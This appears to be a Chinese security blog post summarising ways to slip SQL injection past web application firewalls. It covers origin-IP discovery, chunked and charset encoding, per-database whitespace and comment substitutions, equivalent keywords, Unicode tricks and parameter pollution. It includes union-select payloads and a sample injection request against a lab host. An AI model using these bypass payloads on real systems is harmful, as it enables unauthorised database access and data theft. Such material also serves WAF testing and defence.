实战 | WAF-Bypass之SQL注入绕过思路总结

过WAF（针对云WAF）

寻找真实IP（源站）绕过

如果流量都没有经过WAF，WAF当然无法拦截攻击请求。当前多数云WAF架构，例如百度云加速、阿里云盾等，通过更改DNS解析，把流量引入WAF集群，流量经过检测后转发请求到源站。如图，dict.com接入接入WAF后，dict.com的DNS解析结果指向WAF集群，用户的请求将发送给WAF集群，WAF集群经过检测认为非攻击请求再转发给源站。

image-20211101163158685

绕过云WAF寻找真实IP与绕过CDN寻找真实IP的方法类似，可以查看这篇文章：

https://plumeria.ltd/post/efd52af7.html#CDN%E7%9A%84%E7%BB%95%E8%BF%87

利用同网段绕过

一些在云服务商的站点，同时使用云服务商提供的WAF服务。当流量不是通过DNS解析引流到WAF，流量必须经过WAF的检测，这是不能通过发行源站进行绕过。可以考虑在云服务商买一台VPS，通过VPS攻击目标站点，因为流量是局域网，可能不经过WAF检测，实现绕过。能不能成功，关键在于云服务商的网络配置。

利用边界漏洞绕过

如果未能发现源站IP，可以尝试寻找子站的SSRF漏洞。如果子站访问目标站不经过WAF集群，可以利用SSRF漏洞来绕过WAF。

资源限制角度绕过WAF

超大数据包绕过

这是众所周知、而又难以解决的问题。如果HTTP请求POST BODY太大，检测所有的内容，WAF集群消耗太大的CPU、内存资源。因此许多WAF只检测前面的几K字节、1M、或2M。对于攻击者而然，只需要在POST BODY前面添加许多无用数据，把攻击payload放在最后即可绕过WAF检测。

协议层面绕过WAF

即使流量都确保经过WAF，如果WAF的防御策略根本就没有检测payload，那么也就能绕过WAF。协议层面绕过WAF，利用WAF解析协议的问题，使得payload被认为不是请求的HTTP请求的内容。

协议未覆盖绕过

在 http 头里的 Content-Type 提交表单支持四种协议：

•application/x-www-form-urlencoded -编码模式•multipart/form-data -文件上传模式•text/plain -文本模式•application/json -json模式

文件头的属性是传输前对提交的数据进行编码发送到服务器。其中 multipart/form-data 表示该数据被编码为一条消息,页上的每个控件对应消息中的一个部分。所以，当 waf 没有规则匹配该协议传输的数据时可被绕过。

pipeline绕过

http协议是由tcp协议封装而来，当浏览器发起一个http请求时，浏览器先和服务器建立起连接tcp连接，然后发送http数据包（即我们用burpsuite截获的数据），其中包含了一个Connection字段，一般值为close，apache等容器根据这个字段决定是保持该tcp连接或是断开。当发送的内容太大，超过一个http包容量，需要分多次发送时，值会变成keep-alive，即本次发起的http请求所建立的tcp连接不断开，直到所发送内容结束Connection为close为止。

img

发送两个请求，但绕过失败，被云锁拦截，此种方法现在基本失效。

img

分块传输绕过

分块传输编码（Chunked transfer encoding）是只在HTTP协议1.1版本（HTTP/1.1）中提供的一种数据传送机制。以往HTTP的应答中数据是整个一起发送的，并在应答头里Content-Length字段标识了数据的长度，以便客户端知道应答消息的结束。

分块编码具体方法

在头部加入Transfer-Encoding:chunked之后，就代表这个报文采用了分块编码。这时，报文中的实体需要改为用一系列分块来传输。

每个分块包含十六进制的长度值和数据，长度值独占一行，长度不包括它结尾的CRLF(\r\n)，也不包括分块数据结尾的CRLF。

最后一个分块长度值必须为0，对应的分块数据没有内容，表示实体结束。

例：

Content-Type: text/plain  
Transfer-Encoding: chunked  
  
23\r\n  
This is the data in the first chunk\r\n  
1A\r\n  
and this is the second one\r\n  
3\r\n  
con\r\n  
8\r\n  
sequence\r\n  
0\r\n  
\r\n

也可以使用github上的插件实现分块传输

chunked-coding-converter：https://github.com/c0ny1/chunked-coding-converter

img

另类字符集编码绕过

Content-Type头中使用charset定义字符集的应用场景不只有在responses中，request中同样可以使用。

常见的服务器与可见编码如下所示：

服务器信息

可用编码

说明

Nginx, uWSGI-Django-Python3

IBM037, IBM500, cp875, IBM1026, IBM273

对参数名和参数值进行编码，服务器会对参数名和参数值均进行url解码，需要对等号和& and进行编码(不进行url编码)

Nginx, uWSGI-Django-Python2

IBM037, IBM500, cp875, IBM1026, utf-16, utf-32, utf-32BE, IBM424

对参数名和参数值进行便慢慢 服务器会对参数名和参数值均进行url解码 等号和&符号不应该以任何方式编码。

Apache-TOMCAT8-JVM1.8-JSP

IBM037, IBM500, IBM870, cp875, IBM1026, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM290, IBM297, IBM420, IBM424, IBM-Thai, IBM871, cp1025

参数名按原始格式(可以像往常一样使用url编码)Body不论是否经过url编码均可等号和&符号不应该以任何方式编码

Apache-TOMCAT7-JVM1.6-JSP

IBM037, IBM500, IBM870, cp875, IBM1026, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM297, IBM420, IBM424, IBM-Thai, IBM871, cp1025

参数名按原始格式(可以像往常一样使用url编码) Body 不论是否经过url编码均可 等号和&符号不应该以任何方式编码

IIS6, 7.5, 8, 10 -ASPX (v4.x)

IBM037, IBM500, IBM870, cp875, IBM1026, IBM01047, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, unicodeFFFE, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM290, IBM297, IBM420,IBM423, IBM424, x-EBCDIC-KoreanExtended, IBM-Thai, IBM871, IBM880, IBM905, IBM00924, cp1025

参数名按原始格式(可以像往常一样使用url编码) Body 不论是否经过url编码均可 等号和&符号不应该以任何方式编码

规则缺陷/特性角度绕过WAF

空白符替换绕过

MySQL特性

select id,contents,time from news where news_id=1①union②select③1,2,username④from⑤admin

•位置①•可以利用其它控制字符替换空格：%09,%0a,%0b,%0c,%0d,%20,%a0•可以利用注释符号替换空格：/**/、%23est%0d%0a、 --+a%0d%0a•可以利用数学运算以及数据类型：news_id=1.0，news_id=1E0，news_id=\N•位置②•可以利用其它控制字符替换空格：%09,%0a,%0b,%0c,%0d,%20,%a0•可以利用注释符号替换空格：/**/、%23test%0d%0a、 --+a%0d%0a•可以利用括号：union(select 1,2)•位置③•可以利用其它控制字符替换空格：%09,%0a,%0b,%0c,%0d,%20,%a0•可以利用注释符号替换空格：/**/、%23test%0d%0a、 --+a%0d%0a•可以利用其它符号：+ 、- 、 ~ 、!、@•位置④•可以利用其它控制字符替换空格：%09,%0a,%0b,%0c,%0d,%20,%a0•可以利用注释符号替换空格：/**/、%23test%0d%0a、 --+a%0d%0a•大括号{}：union select {``1},{x 2}•可利用数学运算以及数据类型：

union select usename,2.0from admin union select username,8e0from admin union select username,\Nfrom admin

•位置⑤•可以利用其它控制字符替换空格：%09,%0a,%0b,%0c,%0d,%20,%a0•可以利用注释符号替换空格：/**/、%23test%0d%0a、 --+a%0d%0a•反引号`：union select 1,table_name,3 from`information_schema`.`tables`limit 0,1%23•内联注释：union select 1,table_name,3 from /*!50001information_schema.tables*/ limit 0,1%23•大括号{}：union select 1,table_name,3 from{x information_schema.tables}limit 0,1%23•小括号()：union select 1,table_name,3 from(information_schema.tables)limit 0,1%23

SQLServer特性

select id,contents,time from news where news_id=1①union②select③1,2,db_name()④from⑤admin

- 位置①
  - 可以利用其它控制字符替换空格：%01~%0F、%11~%1F
  - 可以利用注释符号：/**/、--+a%0d%0a
  - 可利用数学运算符以及数据类型：news_id=1.0，news_id=1e0，news_id=1-1
- 位置②
  - 可以利用其它控制字符替换空格：%01~%0F、%11~%1F
  - 可以利用注释符号：/**/、--+a%0d%0a
  - 可以利用加号+替换空格：union+select
- 位置③
  - 可以利用其它控制字符替换空格：%01~%0F、%11~%1F
  - 可以利用注释符号：/**/、--+a%0d%0a
  - 可利用数学运算符：+、-、~、.    （注：其中-、~、.号必须是select查询的第一个字段的数据类型为数字型才能使用）
  - 可以利用小括号()替换空格：select(1),2,db_name()
- 位置④
  - 可以利用其它控制字符替换空格：%01~%0F、%11~%1F
  - 可以利用注释符号：/**/、--+a%0d%0a
  - 可利用其他字符：%80~%FF（需要IIS服务器支持）
- 位置⑤
  - 可以利用其它控制字符替换空格：%01~%0F、%11~%1F
  - 可以利用注释符号：/**/、--+a%0d%0a
  - 可利用其他字符：%80~%FF（需要IIS服务器支持）
  - 可以利用点号.替换空格：from.users
  - 可以利用中括号[]替换空格：from[users]

Access特性

select id,contents,time from news where news_id=1①union②select③1,2,username④from⑤admin

•位置①•可利用其他控制字符替换空格：%09、%0a、%0c、%0d、%16•位置②•可利用其他控制字符替换空格：%09、%0a、%0c、%0d•位置③•可利用其他控制字符替换空格：%09、%0a、%0c、%0d•可使用其他字符：+、-、.、=

Oracle特性

select id,contents,time from news where news_id=1①union②select③1,2,username④from⑤admin

•位置①•可利用其他控制字符替换空格：%00、%09、%0a、%0b、%0c、%0d•可以利用其它控制字符替换空格：%1f、%1d•可使用其他字符：.•位置②•可利用其他控制字符替换空格：%00、%09、%0a、%0b、%0c、%0d•位置③•可利用其他控制字符替换空格：%00、%09、%0a、%0b、%0c、%0d•可使用其他字符：-、+、%ad•位置④•可利用其他控制字符替换空格：%09、%0a、%0c、%0d•位置⑤•可利用其他控制字符替换空格：%09、%0a、%0c、%0d•可插入字符：%30%ff、%24、%7b%22%7b%76

PostgreSQL特性

select id,contents,time from news where news_id=1①union②select③1,2,username④from⑤admin

•位置①•可利用其他控制字符替换空格：%09、%0a、%0c、%0d•可使用其他字符：.、!•位置②•可利用其他控制字符替换空格：%09、%0a、%0c、%0d•位置③•可利用其他控制字符替换空格：%09、%0a、%0c、 %0d•可使用其他字符：.、、@、-、+•位置④•可利用其他控制字符替换空格：%09、%0a、%0c、%0d•位置⑤•可利用其他控制字符替换空格：%09、%0a、%0c、%0d•可插入字符：%30%ff、%24

函数分隔符绕过

对基于正则表达式的WAF，我们猜测安全工程师写WAF规则时，可能不知道函数名与左括号之间可以存在特殊字符，或者遗漏可以存在特殊字符。例如匹配函数”concat()”的规则写法，“concat(”或者”concat\s*(”，就没有考虑到一些特殊字符。相应的绕过方法，在特殊位置引入特殊的分隔符，逐个测试。这些特殊分隔符发现也是通过Fuzz出来的。

等价关键字绕过

有些函数或命令因其关键字被检测出来而无法使用但是在很多情况下可以使用与之等价或类似的代码替代其使用。

以下举例了mysql中的等价关键字：

hex()、bin() ==> ascii()  
  
sleep() ==>benchmark()  
  
concat_ws()==>group_concat()  
  
mid()、substr() ==> substring()  
  
updatexml、extractvalue() ==> polygon()  
  
@@user ==> user()  
  
@@datadir ==> datadir()  
  
and ==> &&  
  
or ==> ||  
  
not ==> !  
  
xor ==> |  
  
= ==> like  
  
!= ==> <>  
  
limit 0,1 ==> limit 1 offset 0  
  
union select ==> union select * from (select 1)a join (select 2)b  
  
’‘ ==> ""  
  
'admin' ==> 0x61646D696E  
  
select * from users where id = 1 order 4 ==> select * from users where id = 1 into @a,@b,@c,@d

添加库名绕过

以下两条查询语句，执行的结果是一致的，但是有些 waf 的拦截规则 并不会拦 截[库名].[表名]这种模式。

ALL 或者 DISTINCT 绕过

去掉重复值

select 1,2 from users where user_id=1 union DISTINCT select 1,2   
  
select 1,2 from users where user_id=1 union select DISTINCT 1,2

显示全部

select 1,2 from users where user_id=1 union all   
  
select 1,2 select 1,2 from users where user_id=1 union select all 1,

大小写绕过

常用于 waf的正则对大小写不敏感的情况，一般都是题目自己故意这样设计。

select * from users where id=1 UNION SELECT 1,2,3,4;   
  
select * from users where id=1 UniON SelECT 1,2,3,4

双关键字绕过

在某一些简单的waf中，将关键字select等只使用replace()函数置换为空，这时候可以使用双写关键字绕过。例如select变成seleselectct，在经过waf的处理之后又变成select，达到绕过的要求。

双重/多重URL编码绕过

双重url编码，即对于浏览器发送的数据进行了两次urlencode操作，如s做一次url编码是%73,再进行一次编码是%25%37%33。一般情况下数据经过WAF设备的时候只会做一次url解码，这样解码之后的数据一般不会匹配到规则，达到了bypass的效果。

Unicode编码绕过

IIS服务器支持对于unicode的解析，例如我们对于select中的字符进行unicode编码，可以得到如下的s%u006c%u0006ect，这种字符在IIS接收到之后会被转换为select，但是对于WAF层，可能接收到的内容还是s%u006c%u0006ect，这样就会形成bypass的可能。

字符

Unicode编码

a

%u0000 %u0041 %u0061 %u00aa %u00e2

单引号

%u0027 %u02b9 %u02bc %u02c8 %u2032 %uff07 %c0%27 %c0%a7 %e0%80%a7

空白

%u0020 %uff00 %c0%20 %c0%a0 %e0%80%a0

左括号(

%u0028 %uff08 %c0%28 %c0%a8 %e0%80%a8

右括号)

%u0029 %uff09 %c0%29 %c0%a9 %e0%80%a9

Emoji表情字符绕过

emoji是一串unicode字集组成，一个emoji图标可以占2、4、7个字节。且mysql支持emoji存储。

部分Emoji可以插入到%23与%0A之间实现绕过。

json提交与xml提交绕过

有些程序是 json 提交参数，程序也是 json 接收再拼接到 SQL 执行 json 格式通 常不会被拦截。所以可以绕过 waf。

POST /06/vul/sqli/sqli_id.php HTTP/1.1  
Host: 192.168.0.115  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type:application/json  
Content-Length: 38  
Origin: http://192.168.0.115  
Connection: close  
Referer: http://192.168.0.115/06/vul/sqli/sqli_id.php  
Cookie: PHPSESSID=e6sa76lft65q3fd25bilbc49v3; security_level=0  
Upgrade-Insecure-Requests: 1  
  
{'id':1 union select 1,2,3,'submit':1}

image-20211101231132608

同样 text/xml 也不会被拦截

特殊的百分号

在ASP/ASPX+IIS的环境中存在一个特性，就是特殊符号%，在该环境下当们我输入s%elect的时候，在WAF层可能解析出来的结果就是s%elect，但是在iis+asp的环境的时候，解析出来的结果为select。

HTTP参数污染

HPP是HTTP Parameter Pollution的缩写，意为HTTP参数污染。

在ASPX中，有一个比较特殊的HPP特性，当GET/POST/COOKIE同时提交的参数id，服务端接收参数id的顺序GET,POST,COOKIE，中间通过逗号链接，于是就有了这个idea。

UNION、SELECT、FROM 三个关键字分别放在GET/POST/COOKIE的位置，通过ASPX的这个特性连起来，堪称完美的一个姿势，压根不好防。

但姿势利用太过于局限：使用Request.Params["id"]来获取参数,G-P-C获取到参数拼接起来，仅仅作为Bypass分享一种思路而已。

下表中列举了一些主流环境下的HPP情况：

image-20211101212812215

GET方法传输POST数据绕过

大家的常识是GET参数通过URL传递，POST放在Request body中。

但是在某些中间件（如IIS）中的GET请求同样可以传输POST数据。

畸形method绕过

某些WAF在处理数据的时候严格按照GET、POST等标准HTTP方法来获取数据，或者采用正则匹配的方式来处理数据，可能因为WAF和WEB服务解析的前后不对等绕过WAF。

存在环境：Apache 2.X

某些apache版本在做GET请求的时候，无论method为何值均会取出GET的内容。

image-20211101212939505

畸形的boundary绕过

PHP在解析multipart data的时候有自己的特性，对于boundary的识别，只取了逗号前面的内容，例如我们设置的boundary为----aaaa,123456，php解析的时候只识别了----aaaa，后面的内容均没有识别。然而WAF在做解析的时候，有可能获取的是整个字符串，此时可能就会出现绕过。

存在环境：PHP

参数数量限制绕过

WAF在实际环境中为防止拒绝服务式攻击 (denial of service attacks)，默认最多解析前 100 个请求参数 (包括同名的)，更多的参数将直接忽略。

存在环境：Nginx+Lua WAF

image-20211101215241527

变换请求方式绕过

假如php里使用$_REQUEST获取参数，那么php获取参数的默认优先级是：

$_COOKIE
 > $_POST
 > $_GET
。此时WAF层只过滤get/post，但没有过滤cookie，于是导致了绕过。

存在环境：PHP

信任白名单绕过

有些 WAF 会自带一些文件白名单，对于白名单 waf 不会拦截任何操作，所以可 以利用这个特点，可以试试白名单绕过。

白名单通常有目录：

/admin  
  
/phpmyadmin  
  
/admin.php

image-20211101220538726

静态文件绕过

除了白名单信任文件和目录外，还有一部分 waf 并不会对静态文件进行拦截。例如 图片文件 jpg 、png 、gif 或者 css 、js 会对这些静态文件的操作不会 进行检测从而绕过 waf 拦截。

/1.jpg&name=vince+&submit=1  
  
/1.jpg=/1.jpg&name=vince+&submit=1  
  
/1.css=/1.css&name=vince+&submit=1

image-20211101230701225

PostgreSQL字符串特性绕过

由于 postgres 会将双引号中的内容认为是一个表名/字段名，同时在双引号引起的字符串中使用 U& 前缀转义是合法的，所以当过滤了 information_schema 等关键名称时，可以将其用双引号引用并在其前面 加入 U&转义前缀，同时将其中某个字符替换为对应的 Unicode 表现形式来绕过 WAF。

例如：以下语句同样会返回所有的 Schema

select U&"tabl\0065_sch\0065ma" from U&"inform\0061tion_sch\0065ma".U&"t\0061bles" where   
U&"tabl\0065_sch\0065ma" not in (U&'pg_cat\0061log',U&'inform\0061tion_sch\0065ma') group by 1;

推荐阅读

实战 | Bypass云锁MySQL注入总结

实战 | BypassD盾之SQL注入绕过总结

实战 | WAF-Bypass之SQL注入绕过安全狗

WAF攻防研究之四个层次Bypass WAF

https://blog.csdn.net/Fly\_hps/article/details/86626985

那些可以绕过WAF的各种特性

https://cloud.tencent.com/developer/article/1605492?from=article.detail.1813470

waf从入门到Bypass

http://github.wh0ale.xyz/2019/12/04/waf从入门到Bypass/

干货|各种WAF绕过手法学习

https://blog.csdn.net/zhangge3663/article/details/116394692

利用分块传输绕WAF

https://www.cnblogs.com/renhaoblog/p/13395539.html

技术讨论 | 在HTTP协议层面绕过WAF

https://www.freebuf.com/sectool/193659.html)

点赞，转发，在看

原创作者：Ulysses

内部学员投稿